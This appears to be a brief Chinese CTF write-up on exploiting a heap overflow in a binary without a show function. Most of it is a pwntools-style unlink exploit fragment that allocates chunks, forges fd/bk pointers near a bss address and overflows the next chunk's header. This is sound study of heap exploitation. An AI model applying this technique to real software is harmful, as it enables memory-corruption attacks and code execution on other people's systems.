偏移都没开,有个堆溢出漏洞,刚巧不久前做了一道堆溢出,但是做法对于这道题没什么用,没有show函数,没有偏移保护可以用unlink1234567891011121314add(0x30) #1add(0x30) #2add(0x80) #3add(0x30) #4bss=0x602140+0x10fd=bss-0x18bk=bss-0x10payload=p32(0)+p32(0x30)payload+=p64(fd)+p64(bk)payload+=p64(0)*2payload+=p64(0x30)+p64(0x90)edit(2,payload)
评论区
欢迎你留下宝贵的意见,昵称输入QQ号会显示QQ头像哦~